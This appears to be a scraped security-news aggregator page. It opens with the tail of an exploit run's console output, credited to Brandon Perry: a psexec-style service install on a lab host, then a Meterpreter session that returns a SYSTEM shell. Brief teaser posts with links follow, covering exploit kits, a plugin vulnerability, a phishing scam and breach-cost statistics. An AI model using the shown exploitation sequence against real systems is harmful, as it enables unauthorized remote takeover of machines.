[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668)
at 2014-10-12 00:44:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Authored by Brandon Perry

Archie and Astrum: New Players in the Exploit Kit Market

December 11, 2014, 12:31 pm

≫ Next: Critical vulnerability affecting HD FLV Player

≪ Previous: BMC TrackIt! Unauthenticated Arbitrary Local System User Password Change

$

0

0

Exploit kits continue to be a critical tool for the propagation of crimeware. New exploit kits have appeared this year, and this post will discuss two of them — Archie and Astrum.

more here...........https://www.f-secure.com/weblog/archives/00002776.html

Critical vulnerability affecting HD FLV Player

December 11, 2014, 12:32 pm

≫ Next: Free SSL certificate from CloudFlare abused in phishing scam

≪ Previous: Archie and Astrum: New Players in the Exploit Kit Market

$

0

0

We’ve been notified of a critical vulnerability affecting the HD FLV Player plugin for Joomla!, WordPress and custom websites. It was silently patched on Joomla! and WordPress, leaving the custom website version vulnerable.

more here.........http://blog.sucuri.net/2014/12/critical-vulnerability-in-joomla-hd-flv-player-plugin.html

Free SSL certificate from CloudFlare abused in phishing scam

December 11, 2014, 12:35 pm

≫ Next: Analyzing Ponemon Cost of Data Breach

≪ Previous: Critical vulnerability affecting HD FLV Player

$

0

0

Today we received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a fake invoice

more here.........https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/

Analyzing Ponemon Cost of Data Breach

December 11, 2014, 9:04 pm

≫ Next: Phase Bot - A Fileless Rootkit

≪ Previous: Free SSL certificate from CloudFlare abused in phishing scam

$

0

0

I was recently presenting on the use of statistics for risk analysis at the SIRACon conference held in Minneapolos (Oct. 9th and 10th, 2014). I was explaining how models and algorithms work at a high level: given one or more observations and the outcomes, we build models or algorithms to learn how the observations can help predict the outcome. As examples I used things like CVSS, the Binary Risk Assessment and the Ponemon cost of data breach (CODB) report.

more here..........http://datadrivensecurity.info/blog/posts/2014/Dec/ponemon/